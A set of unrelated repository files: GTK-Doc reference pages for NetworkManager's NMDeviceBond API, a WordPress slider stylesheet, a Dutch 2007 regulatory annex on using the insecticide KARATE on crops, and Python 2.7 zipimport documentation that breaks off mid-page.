</tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="nm-device-bond-get-hw-address"></a><h3>nm_device_bond_get_hw_address ()</h3> <pre class="programlisting">const <span class="returnvalue">char</span> * nm_device_bond_get_hw_address (<em class="parameter"><code><a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> *device</code></em>);</pre> <p> Gets the hardware (MAC) address of the <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> </p> <div class="variablelist"><table border="0" class="variablelist"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>device</code></em> :</span></p></td> <td>a <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> </td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>the hardware address. This is the internal string used by the device, and must not be modified.</td> </tr> </tbody> </table></div> </div> <hr> <div class="refsect2"> <a name="nm-device-bond-get-slaves"></a><h3>nm_device_bond_get_slaves ()</h3> <pre class="programlisting">const <a href="http://library.gnome.org/devel/glib/unstable/glib-Pointer-Arrays.html#GPtrArray"><span class="returnvalue">GPtrArray</span></a> * nm_device_bond_get_slaves (<em class="parameter"><code><a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> *device</code></em>);</pre> <p> Gets the devices currently slaved to <em class="parameter"><code>device</code></em>. </p> <div class="variablelist"><table border="0" class="variablelist"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>device</code></em> :</span></p></td> <td>a <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a> </td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>the <a href="http://library.gnome.org/devel/glib/unstable/glib-Pointer-Arrays.html#GPtrArray"><span class="type">GPtrArray</span></a> containing <a class="link" href="NMDevice.html" title="NMDevice"><span class="type">NMDevice</span></a>s that are slaves of <em class="parameter"><code>device</code></em>. This is the internal copy used by the device, and must not be modified. <span class="annotation">[<acronym title="Generics and defining elements of containers and arrays."><span class="acronym">element-type</span></acronym> NMClient.Device]</span> </td> </tr> </tbody> </table></div> <p class="since">Since 0.9.6.4</p> </div> <hr> <div class="refsect2"> <a name="nm-device-bond-new"></a><h3>nm_device_bond_new ()</h3> <pre class="programlisting"><a href="http://library.gnome.org/devel/gobject/unstable/gobject-The-Base-Object-Type.html#GObject"><span class="returnvalue">GObject</span></a> * nm_device_bond_new (<em class="parameter"><code><span class="type">DBusGConnection</span> *connection</code></em>, <em class="parameter"><code>const <span class="type">char</span> *path</code></em>);</pre> <p> Creates a new <a class="link" href="NMDeviceBond.html" title="NMDeviceBond"><span class="type">NMDeviceBond</span></a>. </p> <div class="variablelist"><table border="0" class="variablelist"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><span class="term"><em class="parameter"><code>connection</code></em> :</span></p></td> <td>the <span class="type">DBusGConnection</span> </td> </tr> <tr> <td><p><span class="term"><em class="parameter"><code>path</code></em> :</span></p></td> <td>the DBus object path of the device</td> </tr> <tr> <td><p><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></p></td> <td>a new device. <span class="annotation">[<acronym title="Free data after the code is done."><span class="acronym">transfer full</span></acronym>]</span> </td> </tr> </tbody> </table></div> </div> </div> <div class="refsect1"> <a name="NMDeviceBond.property-details"></a><h2>Property Details</h2> <div class="refsect2"> <a name="NMDeviceBond--carrier"></a><h3>The <code class="literal">"carrier"</code> property</h3> <pre class="programlisting"> "carrier" <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gboolean"><span class="type">gboolean</span></a> : Read</pre> <p> Whether the device has carrier. </p> <p>Default value: FALSE</p> </div> <hr> <div class="refsect2"> <a name="NMDeviceBond--hw-address"></a><h3>The <code class="literal">"hw-address"</code> property</h3> <pre class="programlisting"> "hw-address" <a href="http://library.gnome.org/devel/glib/unstable/glib-Basic-Types.html#gchar"><span class="type">gchar</span></a>* : Read</pre> <p> The hardware (MAC) address of the device. </p> <p>Default value: NULL</p> </div> <hr> <div class="refsect2"> <a name="NMDeviceBond--slaves"></a><h3>The <code class="literal">"slaves"</code> property</h3> <pre class="programlisting"> "slaves" <span class="type">NMObjectArray</span>* : Read</pre> <p> The devices (<a class="link" href="NMDevice.html" title="NMDevice"><span class="type">NMDevice</span></a>) slaved to the bond device. </p> <p class="since">Since 0.9.8</p> </div> </div> </div> <div class="footer"> <hr> Generated by GTK-Doc V1.18</div> </body> </html>
wp-content/themes/dealspitara/theia-post-slider/css/super-mono,-green-32.css
AvyuktaInfotech/KhooniKhilone
.theiaPostSlider_nav { margin: 16px 0; -webkit-user-select: none; -moz-user-select: none; user-select: none; } .theiaPostSlider_nav > * { display: inline-block; vertical-align: middle; } .theiaPostSlider_nav > ._text { margin: 0 10px; } .theiaPostSlider_nav > ._prev, .theiaPostSlider_nav > ._next { cursor: pointer; overflow: hidden; font-size: 0; text-indent: -9999px; transition: none !important; -moz-transition: none !important; -o-transition: none !important; -webkit-transition: none !important; } .theiaPostSlider_nav > ._disabled { cursor: default; } .theiaPostSlider_nav._left { text-align: left; } .theiaPostSlider_nav._center { text-align: center; } .theiaPostSlider_nav._right { text-align: right; } .theiaPostSlider_slides { list-style: none; overflow: hidden; position: relative; margin: 0; padding: 0; } .theiaPostSlider_slides > div { overflow: auto; } .theiaPostSlider_nav > ._prev { height: 32px; width: 32px; background: url('../images/super-mono,-green-32-saa6f135ebb.png') 0 -32px; } .theiaPostSlider_nav > ._prev:hover { background: url('../images/super-mono,-green-32-saa6f135ebb.png') 0 -96px; } .theiaPostSlider_nav > ._prev._disabled { background: url('../images/super-mono,-green-32-saa6f135ebb.png') 0 -128px; } .theiaPostSlider_nav > ._next { height: 32px; width: 32px; background: url('../images/super-mono,-green-32-saa6f135ebb.png') 0 0; } .theiaPostSlider_nav > ._next:hover { background: url('../images/super-mono,-green-32-saa6f135ebb.png') 0 -64px; } .theiaPostSlider_nav > ._next._disabled { background: url('../images/super-mono,-green-32-saa6f135ebb.png') 0 -160px; }
doc/ctgb_html/12698.html
ivorbosloper/pestileaks
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>?????</TITLE> <META NAME="GENERATOR" CONTENT="LibreOffice 3.5 (Linux)"> <META NAME="AUTHOR" CONTENT="Anko Arissen"> <META NAME="CREATED" CONTENT="20070824;15430000"> <META NAME="CHANGEDBY" CONTENT="Ministerie van Landbouw, Natuurbeheer en Visserij"> <META NAME="CHANGED" CONTENT="20070824;15430000"> <META NAME="Info 1" CONTENT=""> <META NAME="Info 2" CONTENT=""> <META NAME="Info 3" CONTENT=""> <META NAME="Info 4" CONTENT=""> <STYLE TYPE="text/css"> <!-- @page { size: 8.27in 11.69in; margin-right: 0.83in; margin-top: 0.98in; margin-bottom: 0.98in } P { margin-bottom: 0in; direction: ltr; color: #000000; widows: 2; orphans: 2 } P.western { font-family: "Arial", sans-serif; font-size: 11pt; so-language: nl-NL; font-style: italic } P.cjk { font-family: "Times New Roman", serif; font-size: 11pt; font-style: italic } P.ctl { font-family: "Arial", sans-serif; font-size: 10pt; so-language: ar-SA } --> </STYLE> </HEAD> <BODY LANG="en-US" TEXT="#000000" DIR="LTR"> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><B>BIJLAGE </B><B>I</B> bij het besluit d.d. 24 augustus 2007 tot wijziging van de toelating van het middel KARATE met Zeon Technologie, toelatingnummer 12698 N</P> <P LANG="nl-NL" STYLE="font-style: normal"><BR> </P> <P LANG="nl-NL" ALIGN=CENTER STYLE="font-style: normal">A.</P> <P LANG="" ALIGN=CENTER STYLE="font-style: normal; page-break-after: avoid"> <U>WETTELIJK GEBRUIKSVOORSCHRIFT</U></P> <P LANG="" CLASS="western" ALIGN=CENTER STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Toegestaan is uitsluitend het gebruik als insectenbestrijdingsmiddel in de teelt van:</P> <OL> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">consumptie-, fabrieks-, en pootaardappelen, </P> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">suiker- en voederbieten</P> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">granen, </P> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">landbouwerwten en conservenerwten, </P> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">spruitkool, rode kool, savooie kool, spitskool, witte kool, bloemkool en broccoli,</P> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">zaaiuien, 1e jaars plantuien, 2e jaars plantuien, zilveruien, pickles en sjalotten</P> <LI><P LANG="" CLASS="western" STYLE="font-style: normal">bloembollen</P> </OL> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Om in het water levende organismen te beschermen is toepassing in de teelt van consumptie-, fabrieks-, en pootaardappelen, landbouwerwten en conservenerwten, spruitkool, rode kool, savooie kool, spitskool, witte kool, bloemkool, broccoli, zaaiuien, 1<SUP>e</SUP> jaars plantuien, 2<SUP>e</SUP> jaars plantuien, zilveruien, pickles, sjalotten, tulp en lelie in percelen die grenzen aan oppervlaktewater uitsluitend toegestaan indien gebruik wordt gemaakt 75 % driftreducerende doppen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Gevaarlijk voor niet-doelwitarthropoden. Vermijd onnodige blootstelling.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Gevaarlijk voor bijen. Om de bijen te beschermen mag dit product niet gebruikt worden op in bloei staande gewassen. Gebruik dit product niet op plaatsen waar bijen actief naar voedsel zoeken. </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><B>Veiligheidstermijnen</B></P> <P LANG="" CLASS="western" STYLE="font-style: normal">De termijn tussen de laatste toepassing en de oogst mag niet korter zijn dan:</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>7 dagen</U> voor consumptie-, fabrieks-, en pootaardappelen, landbouwerwten, conservenerwten, </P> <P LANG="" CLASS="western" STYLE="font-style: normal"> spruitkool, rode kool, savooie kool, spitskool, witte kool, zaaiuien, 1e jaars </P> <P LANG="" CLASS="western" STYLE="font-style: normal"> plantuien, 2e jaars plantuien, zilveruien, pickles, sjalotten, bloemkool, broccoli, </P> <P LANG="" CLASS="western" STYLE="font-style: normal"> suiker- en voederbieten</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>28 dagen</U> voor granen</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Dit middel is uitsluitend bestemd voor beroepsmatig gebruik.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" ALIGN=CENTER STYLE="font-style: normal">B.</P> <P LANG="" ALIGN=CENTER STYLE="font-style: normal; page-break-after: avoid"> <U>GEBRUIKSAANWIJZING</U></P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="margin-right: 0.13in; font-style: normal"> <U>Toepassingen</U></P> <P LANG="" CLASS="western" STYLE="margin-right: 0.13in; font-style: normal"> <BR> </P> <P LANG="" CLASS="western" STYLE="margin-right: 0.13in; font-style: normal"> <U>Consumptie-, fabrieks-, en pootaardappelen</U>, ter bestrijding van de larven van de Coloradokever (<I>Leptinotarsa decemlineata</I>).</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Het beste tijdstip voor een bestrijding is wanneer jonge larven op het gewas worden aangetroffen. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal; page-break-before: always"> <BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Consumptie-, fabrieks-, en pootaardappelen</U>, ter bestrijding van groene perzikluis (<I>Myzus persicae</I>), de wegedoornluis (<I>Aphis nasturtii</I>) en aardappeltopluis (<I>Macrosiphium euphorbiae</I>) ter voorkoming van zuigschade.</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Een behandeling uitvoeren wanneer gemiddeld meer dan 50 bladluizen per samengesteld blad voorkomen.</P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>:<B> </B>0,05 liter per ha. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Pootaardappelen</U>, ter voorkoming van overdracht door bladluizen van het Y<SUP>n</SUP>-virus. </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Wekelijks toepassen vanaf de opkomst van het gewas tot één week voor het doodspuiten of looftrekken.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha in combinatie met minerale olie. </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Suiker- en voederbieten</U>, ter bestrijding van trips (<I>Thrips angusticeps</I>). Een behandeling uitvoeren zodra op de jonge plantjes trips worden waargenomen. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Granen</U>, ter bestrijding van bladluizen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Een bespuiting uitvoeren als tenminste op 70 % van de halmen bladluizen worden waargenomen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Een gecombineerde bestrijding van bladluizen en afrijpingsziekten is verantwoord wanneer bij begin van de bloei tenminste 30 % van de halmen met bladluizen is bezet. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Landbouwerwten en conservenerwten</U>, ter bestrijding van de bladrandkever (<I>Sitona lineatus).</I></P> <P LANG="" CLASS="western" STYLE="font-style: normal">Zodra vreterij van de bladrandkever aan de blaadjes van jonge planten wordt waargenomen een behandeling uitvoeren.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha. </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Landbouwerwten en conservenerwten</U>, ter bestrijding van vroege akkertrips (<I>Thrips angusticeps</I>)<I> </I>en erwtentrips<I> </I>(<I>Kakothrips robustus</I>).</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Een behandeling uitvoeren zodra op de jonge planten aantasting wordt waargenomen. </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha. </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Spruitkool, rode kool, savooie kool, spitskool, witte kool, bloemkool en broccoli</U>, ter bestrijding van koolrupsen (<I>Pieris brassicae en P. rapae</I>), koolmot (<I>Plutella xylostella), </I>bladrollers (<I>Clepsis spectrana</I>) en trips (<I>Thrips tabaci</I>); nevenwerking tegen bladluis en bij spruitkool ook tegen late koolvlieg (<I>Delia brassicae</I>). </P> <P LANG="" CLASS="western" STYLE="font-style: normal">De bespuiting zonodig herhalen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha; uitvloeier toevoegen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Spruitkool, rode kool, savooie kool, spitskool, witte kool, bloemkool en broccoli</U>, ter bestrijding van de koolgalmug (<I>Contarinia nasturtii) </I>het middel toepassen zodra de eerste eitjes zijn afgezet. </P> <P LANG="" CLASS="western" STYLE="font-style: normal">De bespuiting zonodig herhalen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha; uitvloeier toevoegen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Zaaiuien, 1e jaars plantuien, 2e jaars plantuien, zilveruien, pickles en sjalotten</U>, ter bestrijding van trips (<I>Thrips tabaci</I>).</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Zodra een aantasting wordt waargenomen een behandeling uitvoeren; de behandeling met een interval van plm. 5 dagen enkele malen herhalen. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha. </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal; page-break-before: always"> <BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Tulp</U>, ter bestrijding van bladluizen ter beperking van verspreiding van niet-persistente virussen.</P> <P LANG="" CLASS="western" STYLE="font-style: normal">Het middel vanaf de eerste week van mei wekelijks toepassen. Bespuitingen voortzetten tot de tweede/derde week van juni.</P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha.</P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="" CLASS="western" STYLE="font-style: normal"><U>Lelies</U>, ter bestrijding van bladluizen ter beperking van verspreiding van niet-persistente virussen. </P> <P LANG="" CLASS="western" STYLE="font-style: normal">Het middel vanaf de eerste week van mei toepassen; in mei, juni en juli wekelijks toepassen, in augustus/september om de 10 dagen.</P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><U>Dosering</U>: 0,05 liter per ha.</P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><BR> </P> <P LANG="nl-NL" CLASS="western" STYLE="font-style: normal"><SPAN LANG="">Bij tulpen en lelies bij voorkeur gecombineerd toepassen met minerale olie om het effect te verbeteren. </SPAN>Met de toepassing zonder minerale olie is nog geen ervaring opgedaan. <SPAN LANG="">Voor de dosering van minerale olie: raadpleeg de voorlichtingsbrochure.</SPAN></P> <P LANG="" CLASS="western" STYLE="font-style: normal"><BR> </P> </BODY> </HTML>
Coding/Python/python-2.7.11rc1-docs-html/library/zipimport.html
platinhom/ManualHom
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>31.4. zipimport — Import modules from Zip archives &mdash; Python 2.7.11rc1 documentation</title> <link rel="stylesheet" href="../static_/default.css" type="text/css" /> <link rel="stylesheet" href="../static_/pygments.css" type="text/css" /> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../', VERSION: '2.7.11rc1', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script type="text/javascript" src="../static_/jquery.js"></script> <script type="text/javascript" src="../static_/underscore.js"></script> <script type="text/javascript" src="../static_/doctools.js"></script> <script type="text/javascript" src="../static_/sidebar.js"></script> <link rel="search" type="application/opensearchdescription+xml" title="Search within Python 2.7.11rc1 documentation" href="../static_/opensearch.xml"/> <link rel="author" title="About these documents" href="../about.html" /> <link rel="copyright" title="Copyright" href="../copyright.html" /> <link rel="top" title="Python 2.7.11rc1 documentation" href="../index.html" /> <link rel="up" title="31. Importing Modules" href="modules.html" /> <link rel="next" title="31.5. pkgutil — Package extension utility" href="pkgutil.html" /> <link rel="prev" title="31.3. imputil — Import utilities" href="imputil.html" /> <link rel="shortcut icon" type="image/png" href="../static_/py.png" /> <script type="text/javascript" src="../static_/copybutton.js"></script> <script type="text/javascript" src="../static_/version_switch.js"></script> </head> <body> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="pkgutil.html" title="31.5. pkgutil — Package extension utility" accesskey="N">next</a> |</li> <li class="right" > <a href="imputil.html" title="31.3. imputil — Import utilities" accesskey="P">previous</a> |</li> <li><img src="../static_/py.png" alt="" style="vertical-align: middle; margin-top: -1px"/></li> <li><a href="https://www.python.org/">Python</a> &raquo;</li> <li> <span class="version_switcher_placeholder">2.7.11rc1</span> <a href="../index.html">Documentation</a> &raquo; </li> <li><a href="index.html" >The Python Standard Library</a> &raquo;</li> <li><a href="modules.html" accesskey="U">31. Importing Modules</a> &raquo;</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="section" id="module-zipimport"> <span id="zipimport-import-modules-from-zip-archives"></span><h1>31.4. <a class="reference internal" href="#module-zipimport" title="zipimport: support for importing Python modules from ZIP archives."><tt class="xref py py-mod docutils literal"><span class="pre">zipimport</span></tt></a> &#8212; Import modules from Zip archives<a class="headerlink" href="#module-zipimport" title="Permalink to this headline">¶</a></h1> <div class="versionadded"> <p><span class="versionmodified">New in version 2.3.</span></p> </div> <p>This module adds the ability to import Python modules (<tt class="file docutils literal"><span class="pre">*.py</span></tt>, <tt class="file docutils literal"><span class="pre">*.py[co]</span></tt>) and packages from ZIP-format archives. It is usually not needed to use the <a class="reference internal" href="#module-zipimport" title="zipimport: support for importing Python modules from ZIP archives."><tt class="xref py py-mod docutils literal"><span class="pre">zipimport</span></tt></a> module explicitly; it is automatically used by the built-in <a class="reference internal" href="../reference/simple_stmts.html#import"><tt class="xref std std-keyword docutils literal"><span class="pre">import</span></tt></a> mechanism for <a class="reference internal" href="sys.html#sys.path" title="sys.path"><tt class="xref py py-data docutils literal"><span class="pre">sys.path</span></tt></a> items that are paths to ZIP archives.</p> <p>Typically, <a class="reference internal" href="sys.html#sys.path" title="sys.path"><tt class="xref py py-data docutils literal"><span class="pre">sys.path</span></tt></a> is a list of directory names as strings. This module also allows an item of <a class="reference internal" href="sys.html#sys.path" title="sys.path"><tt class="xref py py-data docutils literal"><span class="pre">sys.path</span></tt></a> to be a string naming a ZIP file archive. The ZIP archive can contain a subdirectory structure to support package imports, and a path within the archive can be specified to only import from a subdirectory. For example, the path <tt class="file docutils literal"><span class="pre">example.zip/lib/</span></tt> would only import from the <tt class="file docutils literal"><span class="pre">lib/</span></tt> subdirectory within the archive.</p> <p>Any files may be present in the ZIP archive, but only files <tt class="file docutils literal"><span class="pre">.py</span></tt> and <tt class="file docutils literal"><span class="pre">.py[co]</span></tt> are available for import. ZIP import of dynamic modules (<tt class="file docutils literal"><span class="pre">.pyd</span></tt>, <tt class="file docutils literal"><span class="pre">.so</span></tt>) is disallowed. Note that if an archive only contains <tt class="file docutils literal"><span class="pre">.py</span></tt> files, Python will not attempt to modify the archive by adding the corresponding <tt class="file docutils literal"><span class="pre">.pyc</span></tt> or <tt class="file docutils literal"><span class="pre">.pyo</span></tt> file, meaning that if a ZIP archive doesn&#8217;t contain <tt class="file docutils literal"><span class="pre">.pyc</span></tt> files, importing may be rather slow.</p> <p>Using the built-in <a class="reference internal" href="functions.html#reload" title="reload"><tt class="xref py py-func docutils literal"><span class="pre">reload()</span></tt></a> function will fail if called on a module loaded from a ZIP archive; it is unlikely that <a class="reference internal" href="functions.html#reload" title="reload"><tt class="xref py py-func docutils literal"><span class="pre">reload()</span></tt></a> would be needed, since this would imply that the ZIP has been altered during runtime.</p> <p>ZIP archives with an archive comment are currently not supported.</p> <div class="admonition seealso"> <p class="first admonition-title">See also</p> <dl class="last docutils"> <dt><a class="reference external" href="http://www.pkware.com/documents/casestudies/APPNOTE.TXT">PKZIP Application Note</a></dt> <dd>Documentation on the ZIP file format by Phil Katz, the creator of the format and algorithms used.</dd> <dt><span class="target" id="index-0"></span><a class="pep reference external" href="http://www.python.org/dev/peps/pep-0273"><strong>PEP 273</strong></a> - Import Modules from Zip Archives</dt> <dd>Written by James C. Ahlstrom, who also provided an implementation. Python 2.3 follows the specification in PEP 273, but uses an implementation written by Just van Rossum that uses the import hooks described in PEP 302.</dd> <dt><span class="target" id="index-1"></span><a class="pep reference external" href="http://www.python.org/dev/peps/pep-0302"><strong>PEP 302</strong></a> - New Import Hooks</dt> <dd>The PEP to add the import hooks that help this module work.</dd> </dl> </div> <p>This module defines an exception:</p> <dl class="exception"> <dt id="zipimport.ZipImportError"> <em class="property">exception </em><tt class="descclassname">zipimport.</tt><tt class="descname">ZipImportError</tt><a class="headerlink" href="#zipimport.ZipImportError" title="Permalink to this definition">¶</a></dt> <dd><p>Exception raised by zipimporter objects. It&#8217;s a subclass of <a class="reference internal" href="exceptions.html#exceptions.ImportError" title="exceptions.ImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ImportError</span></tt></a>, so it can be caught as <a class="reference internal" href="exceptions.html#exceptions.ImportError" title="exceptions.ImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ImportError</span></tt></a>, too.</p> </dd></dl> <div class="section" id="zipimporter-objects"> <span id="id1"></span><h2>31.4.1. zipimporter Objects<a class="headerlink" href="#zipimporter-objects" title="Permalink to this headline">¶</a></h2> <p><a class="reference internal" href="#zipimport.zipimporter" title="zipimport.zipimporter"><tt class="xref py py-class docutils literal"><span class="pre">zipimporter</span></tt></a> is the class for importing ZIP files.</p> <dl class="class"> <dt id="zipimport.zipimporter"> <em class="property">class </em><tt class="descclassname">zipimport.</tt><tt class="descname">zipimporter</tt><big>(</big><em>archivepath</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter" title="Permalink to this definition">¶</a></dt> <dd><p>Create a new zipimporter instance. <em>archivepath</em> must be a path to a ZIP file, or to a specific path within a ZIP file. For example, an <em>archivepath</em> of <tt class="file docutils literal"><span class="pre">foo/bar.zip/lib</span></tt> will look for modules in the <tt class="file docutils literal"><span class="pre">lib</span></tt> directory inside the ZIP file <tt class="file docutils literal"><span class="pre">foo/bar.zip</span></tt> (provided that it exists).</p> <p><a class="reference internal" href="#zipimport.ZipImportError" title="zipimport.ZipImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ZipImportError</span></tt></a> is raised if <em>archivepath</em> doesn&#8217;t point to a valid ZIP archive.</p> <dl class="method"> <dt id="zipimport.zipimporter.find_module"> <tt class="descname">find_module</tt><big>(</big><em>fullname</em><span class="optional">[</span>, <em>path</em><span class="optional">]</span><big>)</big><a class="headerlink" href="#zipimport.zipimporter.find_module" title="Permalink to this definition">¶</a></dt> <dd><p>Search for a module specified by <em>fullname</em>. <em>fullname</em> must be the fully qualified (dotted) module name. It returns the zipimporter instance itself if the module was found, or <a class="reference internal" href="constants.html#None" title="None"><tt class="xref py py-const docutils literal"><span class="pre">None</span></tt></a> if it wasn&#8217;t. The optional <em>path</em> argument is ignored&#8212;it&#8217;s there for compatibility with the importer protocol.</p> </dd></dl> <dl class="method"> <dt id="zipimport.zipimporter.get_code"> <tt class="descname">get_code</tt><big>(</big><em>fullname</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter.get_code" title="Permalink to this definition">¶</a></dt> <dd><p>Return the code object for the specified module. Raise <a class="reference internal" href="#zipimport.ZipImportError" title="zipimport.ZipImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ZipImportError</span></tt></a> if the module couldn&#8217;t be found.</p> </dd></dl> <dl class="method"> <dt id="zipimport.zipimporter.get_data"> <tt class="descname">get_data</tt><big>(</big><em>pathname</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter.get_data" title="Permalink to this definition">¶</a></dt> <dd><p>Return the data associated with <em>pathname</em>. Raise <a class="reference internal" href="exceptions.html#exceptions.IOError" title="exceptions.IOError"><tt class="xref py py-exc docutils literal"><span class="pre">IOError</span></tt></a> if the file wasn&#8217;t found.</p> </dd></dl> <dl class="method"> <dt id="zipimport.zipimporter.get_filename"> <tt class="descname">get_filename</tt><big>(</big><em>fullname</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter.get_filename" title="Permalink to this definition">¶</a></dt> <dd><p>Return the value <tt class="docutils literal"><span class="pre">__file__</span></tt> would be set to if the specified module was imported. Raise <a class="reference internal" href="#zipimport.ZipImportError" title="zipimport.ZipImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ZipImportError</span></tt></a> if the module couldn&#8217;t be found.</p> </dd></dl> <div class="versionadded"> <p><span class="versionmodified">New in version 2.7.</span></p> </div> <dl class="method"> <dt id="zipimport.zipimporter.get_source"> <tt class="descname">get_source</tt><big>(</big><em>fullname</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter.get_source" title="Permalink to this definition">¶</a></dt> <dd><p>Return the source code for the specified module. Raise <a class="reference internal" href="#zipimport.ZipImportError" title="zipimport.ZipImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ZipImportError</span></tt></a> if the module couldn&#8217;t be found, return <a class="reference internal" href="constants.html#None" title="None"><tt class="xref py py-const docutils literal"><span class="pre">None</span></tt></a> if the archive does contain the module, but has no source for it.</p> </dd></dl> <dl class="method"> <dt id="zipimport.zipimporter.is_package"> <tt class="descname">is_package</tt><big>(</big><em>fullname</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter.is_package" title="Permalink to this 